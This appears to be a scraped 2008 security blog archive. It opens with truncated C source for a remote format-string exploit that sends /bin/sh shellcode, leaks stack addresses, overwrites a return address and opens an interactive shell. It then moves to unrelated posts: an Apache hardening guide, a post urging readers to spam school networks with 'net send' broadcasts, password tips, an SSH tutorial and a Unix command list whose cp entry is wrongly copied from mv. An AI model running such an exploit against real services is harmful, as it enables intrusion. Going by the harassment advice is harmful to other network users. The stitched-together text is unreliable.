build_hn(char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int offset, unsigned int base)
{
unsigned char b0, b1, b2, b3;
unsigned int high, low;
int start = ((base / (ADD * ADD)) + 1) * ADD * ADD;
int sz;

/* : where to overwrite */
OCT(b0, b1, b2, b3, locaddr, "[ locaddr ]");
sz = snprintf(buf, TWO + 1, /* 8 char to have the 2 addresses */
"%c%c%c%c" /* + 1 for the ending \0 */
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 2, b2, b1, b0);

/* where is our shellcode ? */
OCT(b0, b1, b2, b3, retaddr, "[ retaddr ]");
high = (retaddr & 0xffff0000) >> 16;
low = retaddr & 0x0000ffff;

return snprintf(buf + sz, MAX_FMT_LENGTH,
"%%.%hdx%%%d$n%%.%hdx%%%d$hn",
low - TWO + start - base,
offset,
high - low + start,
offset + 1);
}

void get_addr_as_char(u_int addr, char *buf) {

*(u_int*)buf = addr;
if (!buf[0]) buf[0]++;
if (!buf[1]) buf[1]++;
if (!buf[2]) buf[2]++;
if (!buf[3]) buf[3]++;
}

int get_offset(int sock) {

int i, offset = -1, len;
char fmt[128], buf[128];

for (i = 1; i
snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
write(sock, fmt, strlen(fmt));
memset(buf, 0, sizeof(buf));
sleep(1);
if ((len = read(sock, buf, sizeof(buf))) < 0) {
fprintf(stderr, "Error while looking for the offset (%d)\n", len);
close(sock);
exit(EXIT_FAILURE);
}

if (debug)
fprintf(stderr, "testing offset = %d fmt = [%s] buf = [%s] len = %d\n",
i, fmt, buf, len);

if (!strcmp(buf, "AAAA41414141"))
offset = i;
}
return offset;
}

char *shellcode =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
char *ip = "127.0.0.1", *ptr;
struct sockaddr_in sck;
u_int read_at, addr_stack = (u_int)0xbfffe0001; /* default bottom */
u_int addr_shellcode = -1, addr_buffer = -1, addr_ret = -1;
char buf[1024], fmt[128], c;
int port = 12345, offset = -1;
int sd, len, i;

while ((c = getopt(argc, argv, "dvi:p:a:o:")) != -1) {
switch (c) {
case 'i':
ip = optarg;
break;

case 'p':
port = atoi(optarg);
break;

case 'a':
addr_stack = strtoul(optarg, NULL, 16);
break;

case 'o':
offset = atoi(optarg);
break;

case 'v':
verbose = 1;
break;

case 'd':
debug = 1;
break;

default:
fprintf(stderr, "Unknwon option %c (%d)\n", c, c);
exit (EXIT_FAILURE);
}
}

/* init the sockaddr_in */
fprintf(stderr, "Using IP %s\n", ip);
sck.sin_family = PF_INET;
sck.sin_addr.s_addr = resolve(ip);
sck.sin_port = htons (port);

/* open the socket */
if (!(sd = socket (PF_INET, SOCK_STREAM, 0))) {
perror ("socket()");
exit (EXIT_FAILURE);
}

/* connect to the remote server */
if (connect (sd, (struct sockaddr *) &sck, sizeof (sck)) < 0) {
perror ("Connect() ");
exit (EXIT_FAILURE);
}
fprintf (stderr, "Connected to %s\n", ip);
if (debug) sleep(10);

/* send login */
memset (buf, 0x0, sizeof(buf));
len = read(sd, buf, sizeof(buf));
if (strncmp(buf, "login", 5)) {
fprintf(stderr, "Error: no login asked [%s] (%d)\n", buf, len);
close(sd);
exit(EXIT_FAILURE);
}
strcpy(buf, "toto");
len = write (sd, buf, strlen(buf));
if (verbose) fprintf(stderr, "login sent [%s] (%d)\n", buf, len);
sleep(1);

/* passwd: shellcode in the buffer and in the remote stack */
len = read(sd, buf, sizeof(buf));
if (strncmp(buf, "password", 8)) {
fprintf(stderr, "Error: no password asked [%s] (%d)\n", buf, len);
close(sd);
exit(EXIT_FAILURE);
}
write (sd, shellcode, strlen(shellcode));
if (verbose) fprintf (stderr, "passwd (shellcode) sent (%d)\n", len);
sleep(1);

/* find offset */
if (offset == -1) {
if ((offset = get_offset(sd)) == -1) {
fprintf(stderr, "Error: can't find offset\n");
fprintf(stderr, "Please, use the -o arg to specify it.\n");
close(sd);
exit(EXIT_FAILURE);
}
if (verbose) fprintf(stderr, "[Found offset = %d]\n", offset);
}

/* look for the address of the shellcode in the remote stack */
memset (fmt, 0x0, sizeof(fmt));
read_at = addr_stack;
get_addr_as_char(read_at, fmt);
snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
write(sd, fmt, strlen(fmt));
sleep(1);

while((len = read(sd, buf, sizeof(buf))) > 0 &&
(addr_shellcode == -1 || addr_buffer == -1 || addr_ret == -1) ) {

if (debug) fprintf(stderr, "Read at 0x%x (%d)\n", read_at, len);

/* the shellcode */
if ((ptr = strstr(buf, shellcode))) {
addr_shellcode = read_at + (ptr-buf) - 4;
fprintf (stderr, "[shell addr is: 0x%x (%d) ]\n", addr_shellcode, len);
fprintf(stderr, "buf = (%d)\n", len);
for (i=0; i fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
if (i && i%20 == 0) fprintf(stderr, "\n");
}
fprintf(stderr, "\n");
}

/* the input buffer */
if (addr_buffer == -1 && (ptr = strstr(buf, fmt))) {
addr_buffer = read_at + (ptr-buf) - 4;
fprintf (stderr, "[buffer addr is: 0x%x (%d) ]\n", addr_buffer, len);
fprintf(stderr, "buf = (%d)\n", len);
for (i=0; i fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
if (i && i%20 == 0) fprintf(stderr, "\n");
}
fprintf(stderr, "\n\n");
}

/* return address */
if (addr_buffer != -1) {
i = 4;
while (i if (buf[i] == (char)0xff && buf[i+1] == (char)0xbf &&
buf[i+4] == (char)0x04 && buf[i+5] == (char)0x08) {
addr_ret = read_at + i - 2 + 4 - 4;
fprintf (stderr, "[ret addr is: 0x%x (%d) ]\n", addr_ret, len);
}
i++;
}
}

read_at += (len-4+1);
if (len == sizeof(buf)) {
fprintf(stderr, "Warning: this has not been tested !!!\n");
fprintf(stderr, "len = %d\nread_at = 0x%x", len, read_at);
read_at-=strlen(shellcode);
}
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}

/* send the format string */
fprintf (stderr, "Building format string ...\n");
memset(buf, 0, sizeof(buf));
build_hn(buf, addr_ret, addr_shellcode, offset, 0);
write(sd, buf, strlen(buf));
sleep(1);
read(sd, buf, sizeof(buf));

/* call the return while quiting */
fprintf (stderr, "Sending the quit ...\n");
strcpy(buf, "quit");
write(sd, buf, strlen(buf));
sleep(1);

interact(sd);

close(sd);
return 0;
}

------------------------------------------------------------------------

Securing Apache: Step-by-Step

2008-12-20T03:58:00.000+07:00

Functionality

Before we start securing Apache, we must specify what functionality we expect from the server. Variety of Apache's use makes it difficult to write a universal procedure to secure the server in every case. That's why in this article we'll base on the following functionality:

* the Web server will be accessible from the Internet only static HTML pages will be served
* the server will support name-based virtual hosting mechanism
* specified Web pages can be accessible only from selected IP addresses or users (basic authentication)
* the server will log all the Web requests (including information about Web browsers)

It is worth emphasizing that the above model doesn't support PHP, JSP, CGI or any other technologies that make it possible to interact with Web services. The use of such technologies may pose a large security threat, so that even a small, inconspicuous script can radically decrease the server's security level. Why? Primarily, ASP/CGI applications may contain security vulnerabilities (e.g. SQL injection, cross-site-scripting). Secondarily, the technology itself can be dangerous (vulnerabilities in PHP, Perl modules etc.). That's why I strongly recommend using such technologies only when an interaction with a Web site is absolutely necessary.

Security Assumptions

One of the most important elements of every computer project is the specification of security assumptions. This must be fulfilled before the project is implemented. The security assumptions for our Web server are as follows:

* The operating system must be hardened as much as possible, both against local and remote attacks;
* The server must not offer any network services except HTTP: (80/TCP);
* Remote access to the server must be controlled by a firewall, which should block all outbound connections, and allow inbound connections only to the 80/TCP port of the Web server;
* The Apache Web server must be the only service available on the system;
* Only absolutely necessary Apache modules should be enabled;
* Any diagnostic Web pages and automatic directory indexing service must be turned off;
* The server should disclose the least amount of information about itself (security by obscurity);
* The Apache server must run under a unique UID/GID, not used by any other system process;
* Apache's processes must have limited access to the file systems (chrooting); and,
* No shell programs can be present in the Apache's chrooted environment (/bin/sh, /bin/csh etc.).

Installing the Operating System

Before installing Apache we must choose an operating system, upon which the server will run. We've got a broad choice here, because Apache can be compiled and installed on almost every operating system. The rest of the article instructs how to secure the Apache Web server on FreeBSD (4.7), however the described methods are possible to apply in case of most UNIX/Linux systems. The only operating system I do not recommend using is MS Windows - mainly because of the limited capabilities of securing the Apache.

The first step in securing the Web server is hardening the operating system. A discussion of hardening the operating system is beyond the scope of this article. However, there are a lot of documents on the Net describing how to perform that. Readers are encouraged to conduct their own issue on this topic.

After the system is installed and hardened, we have to add a new group and regular user called "apache" like this (an example from FreeBSD):

pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -
s /sbin/nologin

By default, Apache processes run with privileges of user nobody (except the main process, which runs with root privileges) and GID of group nogroup. This might pose a significant security threat. In case of successful break-in, the intruder can obtain access to all other processes that run under the same UID/GID. Hence, the optimum solution is to run Apache under the UID/GID of a unique regular user/group, dedicated to that software.

Preparing the Software

The next step is to download the latest version of the Apache Web server. Some of Apache's options can be enabled only during compilation time, thus it is important to download the source code instead of the binary version.

After downloading the software, we must unpack it. Then we must decide which modules should remain enabled. A short description of all modules available in the latest version of Apache 1.3.x (1.3.27) can be found at http://httpd.apache.org/docs/mod/.

Apache's Modules

The choice of modules is one of the most important steps of securing Apache. We should go by the rule: the less the better. To fulfill the functionality and security assumptions, the following modules must remain enabled:
Module's name Description
httpd_core The core Apache features, required in every Apache installation.
mod_access Provides access control based on client hostname, IP address, or other characteristics of the client request. Because this module is needed to use "order", "allow" and "deny" directives, it should remain enabled.
mod_auth Required in order to implement user authentication using text files (HTTP Basic Authentication), which was specified in functionality assumptions.
mod_dir Required to search and serve directory index files: "index.html", "default.htm", etc.
mod_log_config Required to implement logging of the requests made to the server.
mod_mime Required to set the character set, content- encoding, handler, content-language, and MIME types of documents.

All other Apache's modules must be disabled. We can safely turn them off, mainly because we do not need them. By disabling unneeded modules, we can avoid potential break-ins when new security vulnerabilities are found in one of them.

It is also worth to note that two of Apache's modules can be more dangerous than others: mod_autoindex and mod_info. The first module provides for automatic directory indexing, and is enabled by default. It is very easy to use this module in order to check if Apache runs on a server (e.g. http://server_name/icons/) and to get the content of the Web server's directories, when no index files are found in them. The second module, mod_info, should never be accessible from the Internet, mainly because it reveals the Apache server's configuration.

The next question is how to compile modules. The static method seems to be a better choice. If new vulnerabilities in Apache are found, we will probably recompile not just the vulnerable modules, but the whole software. By choosing the static method, we eliminate the need of one more module - mod_so.

Compiling the software

First of all - if exist - any security patches must be applied. Then, the server should be compiled and installed as follows:

./configure --prefix=/usr/local/apache --disable-module=all --server-
uid=apache --server-gid=apache --enable-module=access --enable-
module=log_config --enable-module=dir --enable-module=mime --enable-
module=auth

make
su
umask 022
make install
chown -R root:sys /usr/local/apache

Chrooting the server

The next step is to limit Apache processes' access to the filesystems. We can achieve that by chrooting it's main daemon (httpd). Generally, the chrooting technique means creating a new root directory structure, moving all daemon files to it, and running the proper daemon in that new environment. Thanks to that, the daemon (and all child processes) will have access only to the new directory structure.

We'll start this process by creating a new root directory structure under the /chroot/httpd directory:

mkdir -p /chroot/httpd/dev
mkdir -p /chroot/httpd/etc
mkdir -p /chroot/httpd/var/run
mkdir -p /chroot/httpd/usr/lib
mkdir -p /chroot/httpd/usr/libexec
mkdir -p /chroot/httpd/usr/local/apache/bin
mkdir -p /chroot/httpd/usr/local/apache/logs
mkdir -p /chroot/httpd/usr/local/apache/conf
mkdir -p /chroot/httpd/www

The owner of all above directories must be root, and the access rights should be set to the 0755. Next, we'll create the special device file: /dev/null:

ls -al /dev/null
crw-rw-rw- 1 root wheel 2, 2 Mar 14 12:53 /dev/null
mknod /chroot/httpd/dev/null c 2 2
chown root:sys /chroot/httpd/dev/null
chmod 666 /chroot/httpd/dev/null

A different method must be used to create a /chroot/httpd/dev/log device, which is also needed for the server to work properly. In case of the FreeBSD system, the following line should be added to the /etc/rc.conf:

syslogd_flags="-l /chroot/httpd/dev/log"

We must restart the system or the syslogd daemon itself for the changes to take effect. In order to create a /chroot/httpd/dev/log device on other operating systems, we must take a look at the proper manuals (man syslogd).

The next step is to copy the main httpd program into the new directory tree with all necessary binaries and libraries. In order to do that, we must prepare the list of all required files. We can make such list by using the following commands (their presence depends on particular operating system):
Command Availability Descript ion
ldd All Lists dynamiic dependencies of executable files or shared libraries
ktrace/ktruss/kdump *BSD Enables kernal process tracing, Displays kernal trace data
Sotruss Solaris Traces shared library procedure calls
strace/ltrace Linux Traces system calls and signals
Strings All Finds the printable strings in binary files
Trace AIX Records selected system events
trace (freeware) HP-UX ß10.20 Print system call and kernal traces of processes
Truss FreeBSD, Solaris, AIX 5L, SCO Unixware Traces system calls and signals
tusc (freeware) HP-UX>11 Traces the system calls a process invokes in HP-UX 11

Examples of using ldd, strings and truss commands are shown below:

localhost# ldd /usr/local/apache/bin/httpd
/usr/local/apache/bin/httpd:
libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280bd000)
libc.so.4 => /usr/lib/libc.so.4 (0x280d6000)

localhost# strings /usr/local/apache/bin/httpd | grep lib
/usr/libexec/ld-elf.so.1
libcrypt.so.2
libc.so.4

localhost# truss /usr/local/apache/bin/httpd | grep open
(...)
open("/var/run/ld-elf.so.hints",0,00) = 3 (0x3)
open("/usr/lib/libcrypt.so.2",0,027757775370) = 3 (0x3)
open("/usr/lib/libc.so.4",0,027757775370) = 3 (0x3)
open("/etc/spwd.db",0,00) = 3 (0x3)
open("/etc/group",0,0666) = 3 (0x3)
open("/usr/local/apache/conf/httpd.conf",0,0666) = 3 (0x3)
(...)

The above commands should be applied not only to the httpd program, but also to all of the libraries and binaries required (libraries often require other libraries). In case of FreeBSD system, the following files have to be copied to the new root directory structure:

cp /usr/local/apache/bin/httpd /chroot/httpd/usr/local/apache/bin/
cp /var/run/ld-elf.so.hints /chroot/httpd/var/run/
cp /usr/lib/libcrypt.so.2 /chroot/httpd/usr/lib/
cp /usr/lib/libc.so.4 /chroot/httpd/usr/lib/
cp /usr/libexec/ld-elf.so.1 /chroot/httpd/usr/libexec/

By using the truss command we can also discover that the following configuration files must be present in the chrooted environment as well:

cp /etc/hosts /chroot/httpd/etc/
cp /etc/host.conf /chroot/httpd/etc/
cp /etc/resolv.conf /chroot/httpd/etc/
cp /etc/group /chroot/httpd/etc/
cp /etc/master.passwd /chroot/httpd/etc/passwords
cp /usr/local/apache/conf/mime.types /chroot/httpd/usr/local/apache/conf/

Note, that from /chroot/httpd/etc/passwords we have to remove all the lines except "nobody" and "apache". In a similar way, we must remove all the lines except "apache" and "nogroup" from /chroot/httpd/etc/group. Next, we have to build the password database as follows:

cd /chroot/httpd/etc
pwd_mkdb -d /chroot/httpd/etc passwords
rm -rf /chroot/httpd/etc/master.passwd

The next step is to test if the httpd server runs correctly in the new chrooted environment. In order to perform that, we have to copy the default Apache configuration file and sample index.html:

cp /usr/local/apache/conf/httpd.conf /chroot/httpd/usr/local/apache/co
nf/
cp /usr/local/apache/htdocs/index.html.en /chroot/httpd/www/index.html

After copying the aforementioned files, we must change the DocumentRoot directive as presented below (in /chroot/httpd/usr/local/apache/conf/httpd.conf):

DocumentRoot "/www"

Next, we can try to run the server:

chroot /chroot/httpd /usr/local/apache/bin/httpd

If any problems occur, I recommend analyzing Apache's log files precisely (/chroot/httpd/usr/local/apache/logs). Alternatively, the following command can be used:

truss chroot /chroot/httpd /usr/local/apache/bin/httpd

The truss program should show the cause of the problems. After eliminating any eventual faults, we can configure the Apache server.

Configuring Apache

The first step is to remove the /chroot/httpd/usr/local/apache/conf/httpd.conf file and create a new one in its place, with content similar to the following:

# =================================================
# Basic settings
# =================================================
ServerType standalone
ServerRoot "/usr/local/apache"
PidFile /usr/local/apache/logs/httpd.pid
ScoreBoardFile /usr/local/apache/logs/httpd.scoreboard
ResourceConfig /dev/null
AccessConfig /dev/null

# =================================================
# Performance settings
# =================================================
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
MinSpareServers 5
MaxSpareServers 10
StartServers 5
MaxClients 150
MaxRequestsPerChild 0

# =================================================
# Apache's modules
# =================================================
ClearModuleList
AddModule mod_log_config.c
AddModule mod_mime.c
AddModule mod_dir.c
AddModule mod_access.c
AddModule mod_auth.c

# =================================================
# General settings
# =================================================
Port 80
User apache
Group apache
ServerAdmin Webmaster@www.ebank.lab
UseCanonicalName Off
ServerSignature Off
HostnameLookups Off
ServerTokens Prod

DirectoryIndex index.html

DocumentRoot "/www/vhosts"

# =================================================
# Access control
# =================================================

Options None
AllowOverride None
Order deny,allow
Deny from all

Order allow,deny
Allow from all

Order allow,deny
Allow from all

# =================================================
# MIME encoding
# =================================================

TypesConfig /usr/local/apache/conf/mime.types

DefaultType text/plain

AddEncoding x-compress Z
AddEncoding x-gzip gz tgz
AddType application/x-tar .tgz

# =================================================
# Logs
# =================================================
LogLevel warn
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
ErrorLog /usr/local/apache/logs/error_log
CustomLog /usr/local/apache/logs/access_log combined

# =================================================
# Virtual hosts
# =================================================
NameVirtualHost *

DocumentRoot "/www/vhosts/www.ebank.lab"
ServerName "www.ebank.lab"
ServerAlias "www.e-bank.lab"
ErrorLog logs/www.ebank.lab/error_log
CustomLog logs/www.ebank.lab/access_log combined

DocumentRoot "/www/vhosts/www.test.lab"
ServerName "www.test.lab"
ErrorLog logs/www.test.lab/error_log
CustomLog logs/www.test.lab/access_log combined

The above configuration includes only the commands that are necessary to fulfill the functionality and security assumptions. In the configuration presented, there are two virtual hosts supported by the Web server:

- www.ebank.lab (www.e-bank.lab)
- www.test.lab

The content of the above Web sites is physically present in the following directories:

- /chroot/httpd/www/vhosts/www.ebank.lab
- /chroot/httpd/www/vhosts/www.test.lab

Each Web site has its own log files, which are present in the following directories:

- /chroot/httpd/usr/local/apache/logs/www.ebank.lab
- /chroot/httpd/usr/local/apache/logs/www.test.lab

The above directories must be created before running the Apache for the first time - otherwise the Apache will not run correctly. The owner of the above directories should be root:sys, and the rights should be set to 0755.

Compared with the default Apache configuration file, the following changes have been made:

* the number of enabled modules has been significantly reduced
* Apache doesn't disclose information about its version number (directives: ServerTokens, ServerSignature)
* Apache's processes (except the root process) are set to be executed with unique regular user's/group's privileges (directives: User, Group)
* Apache will allow access only to the directories, subdirectories and files, which are explicitly specified in the configuration file (directives: Directory, Allow); all other requests will be denied by default
* Apache will log more information about HTTP requests

Final steps

At the end we should create a start-up script "apache.sh", the content of which will be similar to the following:

#!/bin/sh

CHROOT=/chroot/httpd/
HTTPD=/usr/local/apache/bin/httpd
PIDFILE=/usr/local/apache/logs/httpd.pid

echo -n " apache"

case "$1" in
start)
/usr/sbin/chroot $CHROOT $HTTPD
;;
stop)
kill `cat ${CHROOT}/${PIDFILE}`
;;
*)
echo ""
echo "Usage: `basename $0` {start|stop}" >&2
exit 64
;;
esac

exit 0

The above script should be copied to the proper directory (depends on particular UNIX system), where by default startup scripts are held. In case of FreeBSD it is the /usr/local/etc/rc.d directory.

Summary

The above method allows achieving a higher security level of the Apache server than the one, offered in the default installation.

Thanks to enabling only the absolutely necessary Apache modules, finding a new vulnerability in one of them doesn't have to indicate that our server is vulnerable. Hiding the Apache's version number, turning off the directory indexing service, chrooting and restricted configuration make a successful break-in very difficult. A chrooted environment has also one more important advantage - immunity to the large number of exploits, mainly because of lack of the shell (/bin/sh, /bin/csh etc.). Even if an intruder will success in executing system commands, escaping the chrooted environment could turn out to be quite a problem.

Artur Maj works as a security consultant for European Network Security Institute. He is co-author of Solaris Administrator's Security Guide, a step-by-step guide to secure SUN Solaris operating system against intruders. He regularly performs security audits for Internet banks, government institutions and various firms and organizations in Poland.

SENDING BROADCAST MESSAGES

2008-12-20T03:56:00.001+07:00

there is a whole class B range of IP addresses reserved for private (LAN) use
which is 192.168.x.x so u can theoretically have up to 65536 comps in a LAN, but
of course some IPs are reserved, such as 192.168.x.0, and 192.168.x.254 is
usually for gateways or who knows what else, and 192.168.x.255 to broadcast to
the whole network.

the US Robotics router i have happens to use a fixed 3rd byte
of "123" so my lan can only have 256 (minus the reserved IPs) computers on it.
my 2 comps are 192.168.123.1 and 192.168.123.2, and in a DOS prompt i can type
net send 192.168.123.2 "hello world" (or use any aliases such as Localhost or my
"computer name" in place of the IP of course) from any comp on my lan and it
will pop up a box on my specific computer as long as i have a prog running that
handles "net send" messages. i'm not sure about all the windows OSes but i know
that in win98 the program is called winpopup.exe (if u dont have it u need to go
into Add/Remove Programs in the control panel, go to the Windows Setup tab, and
select WinPopup from Accessories or something) and in winXP they are handled by
Windows Messenger (which is installed and runs as a service by default in
winXP--so people that dont know anything and don't have firewalls, etc can
recieve the popups if they haven't configured Messenger on their pc yet! i used
to get a few spam messages a day when i had my firewall off).

ok, so now we know how to send the messages and what progs recieve them....but remember i said that the fourth byte of 255 in an IP address broadcasts to the whole network (or the
whole class C that you specify in the 3rd byte)? there u go! try it in
school...get a DOS shell up and type in net send 192.168.x.255 "screw you all"
or something...don't forget the quotes around the text. if u forget the syntax
just type net send help or net send ? and it will tell you.

To find out what to put for the 3rd byte of the IP u could probably type ipconfig in DOS or winipcfg in windows and look at the 3rd byte of your own IP Address and of the Default
Gateway. if they are different, i would suppose that the Gateway would be the
address for true "broadcasting" i.e. the whole LAN but i don't really know.
oh yeah, by the way, u can send messages to external computers and stuff too,
you're not restricted to sending within your LAN. just use an IP address or
hostname or whatever.

Creating And Maintaining Strong Passwords

2008-12-20T03:55:00.001+07:00

Passwords are essential for the security of your computer, private data,
and everything else that you define as a sensitive information that needs
to be protected against those who are not authorized to view and modify it.
The purpose of this article is to briefly explore various strategies,
as well as provide you with recommendations in a process of creating
and maintaining strong passwords.

1 - Your password must be at least 6 characters long, possesing a
combination of small, capital letters, numbers and characters like
(!@#$%^&*(), which will result in one pretty strong and
hard to crack password.

2 - Do not use dictionary words, or an obvious sequence of keyboard
characters as aaa123bbb, 12345678 etc

3 - Changing your password as often as possible on a monthly
basis would be great.

4 - Do not share your password and ID with anyone, pretending
to be a Customer Support staff members etc. Don't get fooled and
remember that no one can force you into telling your ID and password.

5 - Do not use the same password on the other computer,
service etc as once revealed it would definitely compromise
the Security of all other systems and services.

6 - Do not write your passwords on any papers, notes etc do your
best and memorize them, no matter how secret the place you've
hidden the note is, this is highly insecure way of storing accounting data.

7 - Before entering your ID and password make sure nobody is
watching you. Instead of using the feature "Save password"
within any service or program, consider writing it each time,
as you're significally reducing the risk of someone stealing
your passwords from the computer's cache memory.

8 - Before entering your ID and password, make sure the computer is
well secured: perform trojans and keyloggers clean using popular
software programs. When leaving the computer, or the service you're
using, make sure you Logout, thus protecting the sensitive
data from malicious user, snooping around.

Remember that passwords are the first line of Security within any system.
Make sure they're strong created,and secure maintained.

SSH Tutorial

2008-12-20T03:54:00.000+07:00

SSH (Secure Shell) protocol is the encrypted way to access a remote server
from your workstation using the console.Once you're connected and logged on
the remote machine, you can do stuff( what you are allowed to do) there,
directly from your computer. By using SSH, you encrypt the traffic and
compress it, so it can be more faster, also you can run ftp, pop, and even
ppp via it so your data(username, password for e.g.) will pass along the
internet encrypted.

The traditional network services like ftp, pop or telnet are convenient but
inherently unsafe, since they all make you send a password and data in clear
text over an increasingly unsafe network. The original SSH has been
developed by a Finnish company. Due to copyright restraints and patented
algorithms, the Free Software world now uses OpenSSH, a free SSH work-alike.

In order for ssh to work properly, the remote machine must be running an
sshd daemon, or an equivalent. The SSH server runs on a UNIX machine (it is
theoretically possible to put an SSH server on an NT server, but it has not
been done to my knowledge). SSH comes in two major, partly incompatible
versions, 1.x and 2.x. You won't be able to connect to an SSH 1.x server
with an SSH 2.x client. OpenSSH 2.x supports both versions.If you are
running a unix system (linux for example), you can do SSH from your console
, otherwise, if you are running windows you'll have to get an SSH client,
Putty is very good for it.

First you have to find out about public key cryptography. Public key
cryptography uses a public key to encrypt data and a private key to decrypt
it. The name public key comes from the fact that you can make the encryption
key public without compromising the secrecy of the data or the decryption
key. What this means is that it is safe to send your public key (i.e. the
contents of the ~/.ssh/identity.pub file) in electronic mail or by other
means e.g. to have a system administrator of a remote site install that key
into your ~/.ssh/authorized_keys file. For anyone to actually gain access
they need the corresponding private key (i.e. the decrypted contents of
~/.ssh/identity) to identify themselves.SSH saves it's settings and your
encryption keys in the ~/.ssh subdirectory (a subdirectory in your home
directory).

If you've never used the machine you're on to ssh before, or if you have not
deemed your machine "trusted", you will recieve the following message:

userid> ssh beatbox
Host key not found from the list of known hosts.
Are you sure you want to continue connecting (yes/no)? yes
Host 'beatbox' added to the list of known hosts.
userid@beatbox's password:

If you want to login with a different username then your local username you
will type something like this:

userid> ssh username@hostname

To further protect your private key you should enter a passphrase to encrypt
the key when it is stored in the filesystem. This will prevent people from
using it even if they gain access to your files.

The very first step is to use ssh-keygen to create an authentication key for
yourself. In most cases the defaults for this command are what you
want.Always, type in a good pass-phrase when prompted for one. It can be
multiple words (i.e. spaces are just fine within the phrase), so you could
choose a sentence that you can remember. Changing some of the words by
misspelling them or by changing some of the letters into digits is highly
recommended to increase the strength of your pass phrase.

Here is a sample session, your input is in bold. Note that the pass-phrase
is not echoed back as you type it:

beowulf% ssh-keygen
Initializing random number generator...
Generating p: .++ (distance 6)
Generating q: ........++ (distance 110)
Computing the keys...
Testing the keys...
Key generation complete.
Enter file in which to save the key ($HOME/.ssh/identity): [RETURN]
Enter passphrase (empty for no passphrase): litt1e 1amp jumb3d
Enter same passphrase again: litt1e 1amp jumb3d
Your identification has been saved in /u/kim/.ssh/identity.
Your public key is:
1024 37 [lots of numbers] kim@beowulf.gw.com
Your public key has been saved in /u/kim/.ssh/identity.pub

Now that you are connected, you can safely work on the remote machine thus
no one can see what you are actually doing even if they sniff the traffic,
all the comunication is high encrypted and secure.

Official Unix Command List

2008-12-20T03:51:00.001+07:00

Commands UNIX based
___________________

(cd) % cd [dir]

The cd command changes your current working directory to the directory you specify.

DOS Equivalent: cd

(Ls) % Ls [dir]

The Ls command lists the files and subdirectories in the directory you specify. If not directory is specified,
a list of the files and subdirectories in the current working directory is displayed.

You can add some additional arguments to customize the list display.

% Ls -f

Will append a forward slash to the subdirectory names so you can easily distinguish them from
file names.

% Ls -a

Will show all "hidden files". Hidden files begin with a ".", i.e. ".htaccess" files.

% Ls -l

Will show detailed information about each file and directory, including permissions, ownership,
file size, and when the file was last modified.

% Ls -al

Will show a list of all file names (including hidden files and a forward slash will be appended to directory names.

DOS Equivalent: dir

(cat) % cat [file]

Displays the contents of the filename you specify. If you want to display the file one screen
at a time try "cat [file] | more" or simply "more [file]"

DOS Equivalent: type

(mkdir) % mkdir [dir]

The mkdir command makes a new directory with the name, directory, that you specify.
Simply type "mkdir [dir]" and hit return.

DOS Equivalent: md or mkdir

(rmdir) % rmdir [dir]

The rmdir command removes the directory that you specify. Simply type "rmdir [dir]" and hit
return.

DOS Equivalent: rd or rmdir

(cp) % cp [from] [to]

The MV command renames a file or moves it to a new location. Simply type "MV [from] [to]"
and hit return. You can specify pathnames as part of the file specification. If target-file
exists then it is overwritten.

(MV) % MV [from] [to]

The MV command renames a file or moves it to a new location. Simply type "MV [from] [to]"
and hit return. You can specify pathnames as part of the file specification. If target-file
exists then it is overwritten.

DOS Equivalent: rename

(rm) % rm [file] or rm -f [file]

The rm command deletes (removes) a file. Simply type "rm [file]" and hit return. You can
specify pathnames as part of the file specification.

DOS Equivalent: del

(grep) % grep [pattern] [files]

The grep command finds lines in files that match specified text patterns. Simply type
"grep [pattern] [files]" and hit return. You can specify pathnames as part of the file
specification. For example if you want to search for a patter "gif" in all html files in
your current working directory, you would type "grep gif *.html" and hit return. The grep
command would then list all occurrences of "gif" it finds in .html files in the current
working directory.

(tar) % tar [options] [tarfile] [files]

The tar command copies a file or files to or from an archive. To put all the files in a
directory into one tar format file, simply type "tar cvf tarfile directory" at a Telnet
command prompt and replace tarfile with the name you want to call your archived file, and
replace directory with the name of the directory that contains the files you want to tar.
To extract the files from a tar format archive, simply type "tar -xvf [tarfile]" at a Telnet
command prompt and replace tarfile with the name of the archived file you are extracting.

For example, you could type "tar cvf pages.tar htdocs" at a Telnet command prompt to
archive the files in the htdocs directory to a tar format file called pages.tar.

To view the contents of the pages.tar tarfile without extracting them, type "tar tvf pages.tar".
This will display all files that are included in the tar archive.

You could also type "tar xvf pages.tar" at a Telnet command prompt to extract into the
current directory the files in the archive pages.tar.

(zip) % zip [options] [zipfile] [files]

The zip command compresses a file or list of files into a zip format archive file. This
command is compatible with pkzip on a PC. Simply type "zip [zipfile] [file1] [file2] [file3]
"at a Telnet command prompt and replace zipfile with the name you want to use for your compressed
zip archive file, and replace fileX with the name of the file(s) you want to compress into the
zip archive.

DOS Equivalent: pkzip

NOT AVAILABLE FOR SOLARIS

(unzip) % unzip [options] [zipfile]

The unzip command extracts a zip format archive file. This command is compatible with
pkunzip files from a PC. Simply type "unzip zipfile" at a Telnet command prompt and replace
zipfile with the name of your zip format archive file.

DOS Equivalent: pkunzip

NOT AVAILABLE FOR SOLARIS

(compress) % compress [files]

The compress command shrinks a file or files into compressed versions to save space on your Virtual
Server. This command is good for you to use on your log files when they get very large.
Simply type "compress [filename(s)]" at a Telnet command prompt and replace filename(s)
with the name of your files you want to compress. For example, type "compress access_log agent_log"
at a Telnet command prompt to compress the access_log and agent_log files. The compressed
files will then be access_log.Z and agent_log.Z.

(uncompress) % uncompress [files]

The uncompress command expands a compressed file or set of compressed files. Simply type
